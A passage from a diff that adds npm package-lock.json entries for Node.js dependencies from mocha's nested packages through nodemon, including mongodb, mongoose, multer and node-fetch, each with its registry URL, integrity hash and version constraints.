"path-scurry": "^1.11.1" + }, + "bin": { + "glob": "dist/esm/bin.mjs" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/mocha/node_modules/glob/node_modules/minimatch": { + "version": "9.0.5", + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-9.0.5.tgz", + "integrity": "sha512-G6T0ZX48xgozx7587koeX9Ys2NYy6Gmv//P89sEte9V9whIapMNF4idKxnW2QtCcLiTWlb/wfCabAtAFWhhBow==", + "dev": true, + "license": "ISC", + "dependencies": { + "brace-expansion": "^2.0.1" + }, + "engines": { + "node": ">=16 || 14 >=14.17" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/mocha/node_modules/minimatch": { + "version": "5.1.6", + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-5.1.6.tgz", + "integrity": "sha512-lKwV/1brpG6mBUFHtb7NUmtABCb2WZZmm2wNiOA5hAb8VdCS4B3dtMWyvcoViccwAW/COERjXLt0zP1zXUN26g==", + "dev": true, + "license": "ISC", + "dependencies": { + "brace-expansion": "^2.0.1" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/mocha/node_modules/minipass": { + "version": "7.1.2", + "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.2.tgz", + "integrity": "sha512-qOOzS1cBTWYF4BH8fVePDBOO9iptMnGUEZwNc/cMWnTV2nVLZ7VoNWEPHkYczZA0pdoA7dl6e7FL659nX9S2aw==", + "dev": true, + "license": "ISC", + "engines": { + "node": ">=16 || 14 >=14.17" + } + }, + "node_modules/mocha/node_modules/signal-exit": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", + "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==", + "dev": true, + "license": "ISC", + "engines": { + "node": ">=14" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/mocha/node_modules/yargs-parser": { + "version": "21.1.1", + "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", + "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", + "dev": true, + "license": "ISC", + "engines": { + "node": ">=12" + } + }, + "node_modules/mock-fs": { + "version": "5.2.0", + "resolved": "https://registry.npmjs.org/mock-fs/-/mock-fs-5.2.0.tgz", + "integrity": "sha512-2dF2R6YMSZbpip1V1WHKGLNjr/k48uQClqMVb5H3MOvwc9qhYis3/IWbj02qIg/Y8MDXKFF4c5v0rxx2o6xTZw==", + "dev": true, + "engines": { + "node": 
">=12.0.0" + } + }, + "node_modules/module-details-from-path": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/module-details-from-path/-/module-details-from-path-1.0.3.tgz", + "integrity": "sha1-EUyUlnPiqKNenTV4hSeqN7Z52is=" + }, + "node_modules/moment": { + "version": "2.29.4", + "resolved": "https://registry.npmjs.org/moment/-/moment-2.29.4.tgz", + "integrity": "sha512-5LC9SOxjSc2HF6vO2CyuTDNivEdoz2IvyJJGj6X8DJ0eFyfszE0QiEd+iXmBvUP3WHxSjFH/vIsA0EN00cgr8w==", + "engines": { + "node": "*" + } + }, + "node_modules/moment-timezone": { + "version": "0.5.40", + "resolved": "https://registry.npmjs.org/moment-timezone/-/moment-timezone-0.5.40.tgz", + "integrity": "sha512-tWfmNkRYmBkPJz5mr9GVDn9vRlVZOTe6yqY92rFxiOdWXbjaR0+9LwQnZGGuNR63X456NqmEkbskte8tWL5ePg==", + "dependencies": { + "moment": ">= 2.9.0" + }, + "engines": { + "node": "*" + } + }, + "node_modules/mongodb": { + "version": "6.12.0", + "resolved": "https://registry.npmjs.org/mongodb/-/mongodb-6.12.0.tgz", + "integrity": "sha512-RM7AHlvYfS7jv7+BXund/kR64DryVI+cHbVAy9P61fnb1RcWZqOW1/Wj2YhqMCx+MuYhqTRGv7AwHBzmsCKBfA==", + "license": "Apache-2.0", + "dependencies": { + "@mongodb-js/saslprep": "^1.1.9", + "bson": "^6.10.1", + "mongodb-connection-string-url": "^3.0.0" + }, + "engines": { + "node": ">=16.20.1" + }, + "peerDependencies": { + "@aws-sdk/credential-providers": "^3.188.0", + "@mongodb-js/zstd": "^1.1.0 || ^2.0.0", + "gcp-metadata": "^5.2.0", + "kerberos": "^2.0.1", + "mongodb-client-encryption": ">=6.0.0 <7", + "snappy": "^7.2.2", + "socks": "^2.7.1" + }, + "peerDependenciesMeta": { + "@aws-sdk/credential-providers": { + "optional": true + }, + "@mongodb-js/zstd": { + "optional": true + }, + "gcp-metadata": { + "optional": true + }, + "kerberos": { + "optional": true + }, + "mongodb-client-encryption": { + "optional": true + }, + "snappy": { + "optional": true + }, + "socks": { + "optional": true + } + } + }, + "node_modules/mongodb-connection-string-url": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/mongodb-connection-string-url/-/mongodb-connection-string-url-3.0.1.tgz", + "integrity": "sha512-XqMGwRX0Lgn05TDB4PyG2h2kKO/FfWJyCzYQbIhXUxz7ETt0I/FqHjUeqj37irJ+Dl1ZtU82uYyj14u2XsZKfg==", + "dependencies": { + "@types/whatwg-url": "^11.0.2", + "whatwg-url": "^13.0.0" + } + }, + "node_modules/mongodb-connection-string-url/node_modules/tr46": { + "version": "4.1.1", + "resolved": "https://registry.npmjs.org/tr46/-/tr46-4.1.1.tgz", + "integrity": "sha512-2lv/66T7e5yNyhAAC4NaKe5nVavzuGJQVVtRYLyQ2OI8tsJ61PMLlelehb0wi2Hx6+hT/OJUWZcw8MjlSRnxvw==", + "dependencies": { + "punycode": "^2.3.0" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/mongodb-connection-string-url/node_modules/whatwg-url": { + "version": "13.0.0", + "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-13.0.0.tgz", + "integrity": "sha512-9WWbymnqj57+XEuqADHrCJ2eSXzn8WXIW/YSGaZtb2WKAInQ6CHfaUUcTyyver0p8BDg5StLQq8h1vtZuwmOig==", + "dependencies": { + "tr46": "^4.1.1", + "webidl-conversions": "^7.0.0" + }, + "engines": { + "node": ">=16" + } + }, + "node_modules/mongodb-legacy": { + "version": "6.1.3", + "resolved": "https://registry.npmjs.org/mongodb-legacy/-/mongodb-legacy-6.1.3.tgz", + "integrity": "sha512-XJ2PIbVEHUUF4/SyH00dfeprfeLOdWiHcKq8At+JoEZeTue+IAG39G2ixRwClnI7roPb/46K8IF713v9dgQ8rg==", + "license": "Apache-2.0", + "dependencies": { + "mongodb": "^6.0.0" + }, + "engines": { + "node": ">=16.20.1" + } + }, + "node_modules/mongoose": { + "version": "8.9.5", + "resolved": 
"https://registry.npmjs.org/mongoose/-/mongoose-8.9.5.tgz", + "integrity": "sha512-SPhOrgBm0nKV3b+IIHGqpUTOmgVL5Z3OO9AwkFEmvOZznXTvplbomstCnPOGAyungtRXE5pJTgKpKcZTdjeESg==", + "license": "MIT", + "dependencies": { + "bson": "^6.10.1", + "kareem": "2.6.3", + "mongodb": "~6.12.0", + "mpath": "0.9.0", + "mquery": "5.0.0", + "ms": "2.1.3", + "sift": "17.1.3" + }, + "engines": { + "node": ">=16.20.1" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/mongoose" + } + }, + "node_modules/morgan": { + "version": "1.10.0", + "resolved": "https://registry.npmjs.org/morgan/-/morgan-1.10.0.tgz", + "integrity": "sha512-AbegBVI4sh6El+1gNwvD5YIck7nSA36weD7xvIxG4in80j/UoK8AEGaWnnz8v1GxonMCltmlNs5ZKbGvl9b1XQ==", + "dev": true, + "dependencies": { + "basic-auth": "~2.0.1", + "debug": "2.6.9", + "depd": "~2.0.0", + "on-finished": "~2.3.0", + "on-headers": "~1.0.2" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/morgan/node_modules/debug": { + "version": "2.6.9", + "resolved": "https://registry.npmjs.org/debug/-/debug-2.6.9.tgz", + "integrity": "sha512-bC7ElrdJaJnPbAP+1EotYvqZsb3ecl5wi6Bfi6BJTUcNowp6cvspg0jXznRTKDjm/E7AdgFBVeAPVMNcKGsHMA==", + "dev": true, + "dependencies": { + "ms": "2.0.0" + } + }, + "node_modules/morgan/node_modules/depd": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/depd/-/depd-2.0.0.tgz", + "integrity": "sha512-g7nH6P6dyDioJogAAGprGpCtVImJhpPk/roCzdb3fIh61/s/nPsfR6onyMwkCAR/OlC3yBC0lESvUoQEAssIrw==", + "dev": true, + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/morgan/node_modules/ms": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz", + "integrity": "sha512-Tpp60P6IUJDTuOq/5Z8cdskzJujfwqfOTkrwIwj7IRISpnkJnT6SyJ4PCPnGMoFjC9ddhal5KVIYtAt97ix05A==", + "dev": true + }, + "node_modules/mpath": { + "version": "0.9.0", + "resolved": "https://registry.npmjs.org/mpath/-/mpath-0.9.0.tgz", + "integrity": "sha512-ikJRQTk8hw5DEoFVxHG1Gn9T/xcjtdnOKIU1JTmGjZZlg9LST2mBLmcX3/ICIbgJydT2GOc15RnNy5mHmzfSew==", + "license": "MIT", + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/mquery": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/mquery/-/mquery-5.0.0.tgz", + "integrity": "sha512-iQMncpmEK8R8ncT8HJGsGc9Dsp8xcgYMVSbs5jgnm1lFHTZqMJTUWTDx1LBO8+mK3tPNZWFLBghQEIOULSTHZg==", + "license": "MIT", + "dependencies": { + "debug": "4.x" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/ms": { + "version": "2.1.3", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.3.tgz", + "integrity": "sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==" + }, + "node_modules/msgpackr": { + "version": "1.11.2", + "resolved": "https://registry.npmjs.org/msgpackr/-/msgpackr-1.11.2.tgz", + "integrity": "sha512-F9UngXRlPyWCDEASDpTf6c9uNhGPTqnTeLVt7bN+bU1eajoR/8V9ys2BRaV5C/e5ihE6sJ9uPIKaYt6bFuO32g==", + "license": "MIT", + "optionalDependencies": { + "msgpackr-extract": "^3.0.2" + } + }, + "node_modules/msgpackr-extract": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/msgpackr-extract/-/msgpackr-extract-3.0.3.tgz", + "integrity": "sha512-P0efT1C9jIdVRefqjzOQ9Xml57zpOXnIuS+csaB4MdZbTdmGDLo8XhzBG1N7aO11gKDDkJvBLULeFTo46wwreA==", + "hasInstallScript": true, + "license": "MIT", + "optional": true, + "dependencies": { + "node-gyp-build-optional-packages": "5.2.2" + }, + "bin": { + "download-msgpackr-prebuilds": "bin/download-prebuilds.js" + }, + "optionalDependencies": { + 
"@msgpackr-extract/msgpackr-extract-darwin-arm64": "3.0.3", + "@msgpackr-extract/msgpackr-extract-darwin-x64": "3.0.3", + "@msgpackr-extract/msgpackr-extract-linux-arm": "3.0.3", + "@msgpackr-extract/msgpackr-extract-linux-arm64": "3.0.3", + "@msgpackr-extract/msgpackr-extract-linux-x64": "3.0.3", + "@msgpackr-extract/msgpackr-extract-win32-x64": "3.0.3" + } + }, + "node_modules/multer": { + "version": "1.4.5-lts.1", + "resolved": "https://registry.npmjs.org/multer/-/multer-1.4.5-lts.1.tgz", + "integrity": "sha512-ywPWvcDMeH+z9gQq5qYHCCy+ethsk4goepZ45GLD63fOu0YcNecQxi64nDs3qluZB+murG3/D4dJ7+dGctcCQQ==", + "license": "MIT", + "dependencies": { + "append-field": "^1.0.0", + "busboy": "^1.0.0", + "concat-stream": "^1.5.2", + "mkdirp": "^0.5.4", + "object-assign": "^4.1.1", + "type-is": "^1.6.4", + "xtend": "^4.0.0" + }, + "engines": { + "node": ">= 6.0.0" + } + }, + "node_modules/multicast-dns": { + "version": "7.2.5", + "resolved": "https://registry.npmjs.org/multicast-dns/-/multicast-dns-7.2.5.tgz", + "integrity": "sha512-2eznPJP8z2BFLX50tf0LuODrpINqP1RVIm/CObbTcBRITQgmC/TjcREF1NeTBzIcR5XO/ukWo+YHOjBbFwIupg==", + "dev": true, + "license": "MIT", + "dependencies": { + "dns-packet": "^5.2.2", + "thunky": "^1.0.2" + }, + "bin": { + "multicast-dns": "cli.js" + } + }, + "node_modules/mute-stream": { + "version": "0.0.8", + "resolved": "https://registry.npmjs.org/mute-stream/-/mute-stream-0.0.8.tgz", + "integrity": "sha512-nnbWWOkoWyUsTjKrhgD0dcz22mdkSnpYqbEjIm2nhwhuxlSkpywJmBo8h0ZqJdkp73mb90SssHkN4rsRaBAfAA==" + }, + "node_modules/mv": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/mv/-/mv-2.1.1.tgz", + "integrity": "sha1-rmzg1vbV4KT32JN5jQPB6pVZtqI=", + "optional": true, + "dependencies": { + "mkdirp": "~0.5.1", + "ncp": "~2.0.0", + "rimraf": "~2.4.0" + }, + "engines": { + "node": ">=0.8.0" + } + }, + "node_modules/mv/node_modules/glob": { + "version": "6.0.4", + "resolved": "https://registry.npmjs.org/glob/-/glob-6.0.4.tgz", + "integrity": "sha1-DwiGD2oVUSey+t1PnOJLGqtuTSI=", + "optional": true, + "dependencies": { + "inflight": "^1.0.4", + "inherits": "2", + "minimatch": "2 || 3", + "once": "^1.3.0", + "path-is-absolute": "^1.0.0" + }, + "engines": { + "node": "*" + } + }, + "node_modules/mv/node_modules/rimraf": { + "version": "2.4.5", + "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-2.4.5.tgz", + "integrity": "sha1-7nEM5dk6j9uFb7Xqj/Di11k0sto=", + "optional": true, + "dependencies": { + "glob": "^6.0.1" + }, + "bin": { + "rimraf": "bin.js" + } + }, + "node_modules/namespace-emitter": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/namespace-emitter/-/namespace-emitter-2.0.1.tgz", + "integrity": "sha512-N/sMKHniSDJBjfrkbS/tpkPj4RAbvW3mr8UAzvlMHyun93XEm83IAvhWtJVHo+RHn/oO8Job5YN4b+wRjSVp5g==", + "dev": true + }, + "node_modules/nan": { + "version": "2.22.2", + "resolved": "https://registry.npmjs.org/nan/-/nan-2.22.2.tgz", + "integrity": "sha512-DANghxFkS1plDdRsX0X9pm0Z6SJNN6gBdtXfanwoZ8hooC5gosGFSBGRYHUVPz1asKA/kMRqDRdHrluZ61SpBQ==", + "license": "MIT" + }, + "node_modules/nanoclone": { + "version": "0.2.1", + "resolved": "https://registry.npmjs.org/nanoclone/-/nanoclone-0.2.1.tgz", + "integrity": "sha512-wynEP02LmIbLpcYw8uBKpcfF6dmg2vcpKqxeH5UcoKEYdExslsdUA4ugFauuaeYdTB76ez6gJW8XAZ6CgkXYxA==", + "dev": true + }, + "node_modules/nanomatch": { + "version": "1.2.13", + "resolved": "https://registry.npmjs.org/nanomatch/-/nanomatch-1.2.13.tgz", + "integrity": 
"sha512-fpoe2T0RbHwBTBUOftAfBPaDEi06ufaUai0mE6Yn1kacc3SnTErfb/h+X94VXzI64rKFHYImXSvdwGGCmwOqCA==", + "dev": true, + "dependencies": { + "arr-diff": "^4.0.0", + "array-unique": "^0.3.2", + "define-property": "^2.0.2", + "extend-shallow": "^3.0.2", + "fragment-cache": "^0.2.1", + "is-windows": "^1.0.2", + "kind-of": "^6.0.2", + "object.pick": "^1.3.0", + "regex-not": "^1.0.0", + "snapdragon": "^0.8.1", + "to-regex": "^3.0.1" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/native-promise-only": { + "version": "0.8.1", + "resolved": "https://registry.npmjs.org/native-promise-only/-/native-promise-only-0.8.1.tgz", + "integrity": "sha1-IKMYwwy0X3H+et+/eyHJnBRy7xE=" + }, + "node_modules/native-request": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/native-request/-/native-request-1.1.0.tgz", + "integrity": "sha512-uZ5rQaeRn15XmpgE0xoPL8YWqcX90VtCFglYwAgkvKM5e8fog+vePLAhHxuuv/gRkrQxIeh5U3q9sMNUrENqWw==", + "dev": true, + "optional": true + }, + "node_modules/natural-compare": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", + "integrity": "sha1-Sr6/7tdUHywnrPspvbvRXI1bpPc=" + }, + "node_modules/ncp": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ncp/-/ncp-2.0.0.tgz", + "integrity": "sha1-GVoh1sRuNh0vsSgbo4uR6d9727M=", + "optional": true, + "bin": { + "ncp": "bin/ncp" + } + }, + "node_modules/negotiator": { + "version": "0.6.3", + "resolved": "https://registry.npmjs.org/negotiator/-/negotiator-0.6.3.tgz", + "integrity": "sha512-+EUsqGPLsM+j/zdChZjsnX51g4XrHFOIXwfnCVPGlQk/k5giakcKsuxCObBRu6DSm9opw/O6slWbJdghQM4bBg==", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/neo-async": { + "version": "2.6.2", + "resolved": "https://registry.npmjs.org/neo-async/-/neo-async-2.6.2.tgz", + "integrity": "sha512-Yd3UES5mWCSqR+qNT93S3UoYUkqAZ9lLg8a7g9rimsWmYGK8cVToA4/sF3RrshdyV3sAGMXVUmpMYOw+dLpOuw==", + "dev": true + }, + "node_modules/next-tick": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/next-tick/-/next-tick-1.1.0.tgz", + "integrity": "sha512-CXdUiJembsNjuToQvxayPZF9Vqht7hewsvy2sOWafLvi2awflj9mOC6bHIg50orX8IJvWKY9wYQ/zB2kogPslQ==" + }, + "node_modules/nise": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/nise/-/nise-4.1.0.tgz", + "integrity": "sha512-eQMEmGN/8arp0xsvGoQ+B1qvSkR73B1nWSCh7nOt5neMCtwcQVYQGdzQMhcNscktTsWB54xnlSQFzOAPJD8nXA==", + "dev": true, + "dependencies": { + "@sinonjs/commons": "^1.7.0", + "@sinonjs/fake-timers": "^6.0.0", + "@sinonjs/text-encoding": "^0.7.1", + "just-extend": "^4.0.2", + "path-to-regexp": "^1.7.0" + } + }, + "node_modules/nise/node_modules/isarray": { + "version": "0.0.1", + "resolved": "https://registry.npmjs.org/isarray/-/isarray-0.0.1.tgz", + "integrity": "sha1-ihis/Kmo9Bd+Cav8YDiTmwXR7t8=", + "dev": true + }, + "node_modules/nise/node_modules/path-to-regexp": { + "version": "1.9.0", + "resolved": "https://registry.npmjs.org/path-to-regexp/-/path-to-regexp-1.9.0.tgz", + "integrity": "sha512-xIp7/apCFJuUHdDLWe8O1HIkb0kQrOMb/0u6FXQjemHn/ii5LrIzU6bdECnsiTF/GjZkMEKg1xdiZwNqDYlZ6g==", + "dev": true, + "dependencies": { + "isarray": "0.0.1" + } + }, + "node_modules/no-case": { + "version": "3.0.4", + "resolved": "https://registry.npmjs.org/no-case/-/no-case-3.0.4.tgz", + "integrity": "sha512-fgAN3jGAh+RoxUGZHTSOLJIqUc2wmoBwGR4tbpNAKmmovFoWq0OdRkb0VkldReO2a2iBT/OEulG9XSUc10r3zg==", + "dev": true, + "dependencies": { + "lower-case": "^2.0.2", + "tslib": "^2.0.3" + } + }, + "node_modules/nocache": { + 
"version": "2.1.0", + "resolved": "https://registry.npmjs.org/nocache/-/nocache-2.1.0.tgz", + "integrity": "sha512-0L9FvHG3nfnnmaEQPjT9xhfN4ISk0A8/2j4M37Np4mcDesJjHgEUfgPhdCyZuFI954tjokaIj/A3NdpFNdEh4Q==", + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/nock": { + "version": "13.5.4", + "resolved": "https://registry.npmjs.org/nock/-/nock-13.5.4.tgz", + "integrity": "sha512-yAyTfdeNJGGBFxWdzSKCBYxs5FxLbCg5X5Q4ets974hcQzG1+qCxvIyOo4j2Ry6MUlhWVMX4OoYDefAIIwupjw==", + "dev": true, + "dependencies": { + "debug": "^4.1.0", + "json-stringify-safe": "^5.0.1", + "propagate": "^2.0.0" + }, + "engines": { + "node": ">= 10.13" + } + }, + "node_modules/node-abort-controller": { + "version": "3.1.1", + "resolved": "https://registry.npmjs.org/node-abort-controller/-/node-abort-controller-3.1.1.tgz", + "integrity": "sha512-AGK2yQKIjRuqnc6VkX2Xj5d+QW8xZ87pa1UK6yA6ouUyuxfHuMP6umE5QK7UmTeOAymo+Zx1Fxiuw9rVx8taHQ==", + "dev": true, + "license": "MIT" + }, + "node_modules/node-addon-api": { + "version": "3.2.1", + "resolved": "https://registry.npmjs.org/node-addon-api/-/node-addon-api-3.2.1.tgz", + "integrity": "sha512-mmcei9JghVNDYydghQmeDX8KoAm0FAiYyIcUt/N4nhyAipB17pllZQDOJD2fotxABnt4Mdz+dKTO7eftLg4d0A==" + }, + "node_modules/node-dir": { + "version": "0.1.17", + "resolved": "https://registry.npmjs.org/node-dir/-/node-dir-0.1.17.tgz", + "integrity": "sha512-tmPX422rYgofd4epzrNoOXiE8XFZYOcCq1vD7MAXCDO+O+zndlA2ztdKKMa+EeuBG5tHETpr4ml4RGgpqDCCAg==", + "dev": true, + "dependencies": { + "minimatch": "^3.0.2" + }, + "engines": { + "node": ">= 0.10.5" + } + }, + "node_modules/node-domexception": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/node-domexception/-/node-domexception-1.0.0.tgz", + "integrity": "sha512-/jKZoMpw0F8GRwl4/eLROPA3cfcXtLApP0QzLmUT/HuPCZWyB7IY9ZrMeKw2O/nFIqPQB3PVM9aYm0F312AXDQ==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/jimmywarting" + }, + { + "type": "github", + "url": "https://paypal.me/jimmywarting" + } + ], + "engines": { + "node": ">=10.5.0" + } + }, + "node_modules/node-ensure": { + "version": "0.0.0", + "resolved": "https://registry.npmjs.org/node-ensure/-/node-ensure-0.0.0.tgz", + "integrity": "sha512-DRI60hzo2oKN1ma0ckc6nQWlHU69RH6xN0sjQTjMpChPfTYvKZdcQFfdYK2RWbJcKyUizSIy/l8OTGxMAM1QDw==", + "dev": true, + "license": "MIT" + }, + "node_modules/node-fetch": { + "version": "2.7.0", + "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.7.0.tgz", + "integrity": "sha512-c4FRfUm/dbcWZ7U+1Wq0AwCyFL+3nt2bEw05wfxSz+DWpWsitgmSgYmy2dQdWyKC1694ELPqMs/YzUSNozLt8A==", + "dependencies": { + "whatwg-url": "^5.0.0" + }, + "engines": { + "node": "4.x || >=6.0.0" + }, + "peerDependencies": { + "encoding": "^0.1.0" + }, + "peerDependenciesMeta": { + "encoding": { + "optional": true + } + } + }, + "node_modules/node-fetch-native": { + "version": "1.6.6", + "resolved": "https://registry.npmjs.org/node-fetch-native/-/node-fetch-native-1.6.6.tgz", + "integrity": "sha512-8Mc2HhqPdlIfedsuZoc3yioPuzp6b+L5jRCRY1QzuWZh2EGJVQrGppC6V6cF0bLdbW0+O2YpqCA25aF/1lvipQ==", + "dev": true, + "license": "MIT" + }, + "node_modules/node-fetch/node_modules/tr46": { + "version": "0.0.3", + "resolved": "https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz", + "integrity": "sha1-gYT9NH2snNwYWZLzpmIuFLnZq2o=" + }, + "node_modules/node-fetch/node_modules/webidl-conversions": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz", + "integrity": "sha1-JFNCdeKnvGvnvIZhHMFq4KVlSHE=" + }, + 
"node_modules/node-fetch/node_modules/whatwg-url": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz", + "integrity": "sha1-lmRU6HZUYuN2RNNib2dCzotwll0=", + "dependencies": { + "tr46": "~0.0.3", + "webidl-conversions": "^3.0.0" + } + }, + "node_modules/node-forge": { + "version": "1.3.1", + "resolved": "https://registry.npmjs.org/node-forge/-/node-forge-1.3.1.tgz", + "integrity": "sha512-dPEtOeMvF9VMcYV/1Wb8CPoVAXtp6MKMlcbAt4ddqmGqUJ6fQZFXkNZNkNlfevtNkGtaSoXf/vNNNSvgrdXwtA==", + "engines": { + "node": ">= 6.13.0" + } + }, + "node_modules/node-gyp-build-optional-packages": { + "version": "5.2.2", + "resolved": "https://registry.npmjs.org/node-gyp-build-optional-packages/-/node-gyp-build-optional-packages-5.2.2.tgz", + "integrity": "sha512-s+w+rBWnpTMwSFbaE0UXsRlg7hU4FjekKU4eyAih5T8nJuNZT1nNsskXpxmeqSK9UzkBl6UgRlnKc8hz8IEqOw==", + "license": "MIT", + "optional": true, + "dependencies": { + "detect-libc": "^2.0.1" + }, + "bin": { + "node-gyp-build-optional-packages": "bin.js", + "node-gyp-build-optional-packages-optional": "optional.js", + "node-gyp-build-optional-packages-test": "build-test.js" + } + }, + "node_modules/node-gyp-build-optional-packages/node_modules/detect-libc": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/detect-libc/-/detect-libc-2.0.3.tgz", + "integrity": "sha512-bwy0MGW55bG41VqxxypOsdSdGqLwXPI/focwgTYCFMbdUiBAxLg9CFzG08sz2aqzknwiX7Hkl0bQENjg8iLByw==", + "license": "Apache-2.0", + "optional": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/node-int64": { + "version": "0.4.0", + "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", + "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==" + }, + "node_modules/node-releases": { + "version": "2.0.18", + "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.18.tgz", + "integrity": "sha512-d9VeXT4SJ7ZeOqGX6R5EM022wpL+eWPooLI+5UpWn2jCT1aosUQEhQP214x33Wkwx3JQMvIm+tIoVOdodFS40g==", + "dev": true + }, + "node_modules/nodemailer": { + "version": "6.9.9", + "resolved": "https://registry.npmjs.org/nodemailer/-/nodemailer-6.9.9.tgz", + "integrity": "sha512-dexTll8zqQoVJEZPwQAKzxxtFn0qTnjdQTchoU6Re9BUUGBJiOy3YMn/0ShTW6J5M0dfQ1NeDeRTTl4oIWgQMA==", + "engines": { + "node": ">=6.0.0" + } + }, + "node_modules/nodemailer-ses-transport": { + "version": "1.5.1", + "resolved": "https://registry.npmjs.org/nodemailer-ses-transport/-/nodemailer-ses-transport-1.5.1.tgz", + "integrity": "sha1-3AWYwb9T6GUuYy6PMWks4CLX3qk=", + "dependencies": { + "aws-sdk": "^2.2.36" + } + }, + "node_modules/nodemon": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/nodemon/-/nodemon-3.0.1.tgz", + "integrity": "sha512-g9AZ7HmkhQkqXkRc20w+ZfQ73cHLbE8hnPbtaFbFtCumZsjyMhKk9LajQ07U5Ux28lvFjZ5X7HvWR1xzU8jHVw==", + "dev": true, + "dependencies": { + "chokidar": "^3.5.2", + "debug": "^3.2.7", + "ignore-by-default": "^1.0.1", + "minimatch": "^3.1.2", + "pstree.remy": "^1.1.8", + "semver": "^7.5.3", + "simple-update-notifier": "^2.0.0", + "supports-color": "^5.5.0", + "touch": "^3.1.0", + "undefsafe": "^2.0.5" + }, + "bin": { + "nodemon": "bin/nodemon.js" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/nodemon" + } + }, + "node_modules/nodemon/node_modules/debug": { + "version": "3.2.7", + "resolved": "https://registry.npmjs.org/debug/-/debug-3.2.7.tgz", + "integrity": 
"sha512-CFjzYYAi4ThfiQvizrFQevTTXHtnCqWfe7x1AhgEscTz6ZbLbfoLRLPugTQyBth6f8ZERVUSyWHFD/7Wu4t1XQ==", + "dev": true, + "dependencies": { + "ms": "^2.1.1" + } + }, + "node_modules/nodemon/node_modules/has-flag": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", + "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", + "dev": true, + "engines": { + "node": ">=4" + } + }, + "node_modules/nodemon/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dev": true, + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/nodemon/node_modules/semver": { + "version": "7.5.4", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", + "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", + "dev": true, + "dependencies": { + "lru-cache": "^6.0.0" + }, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/nodemon/node_modules/supports-color": { + "version": "5.5.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", + "integrity": 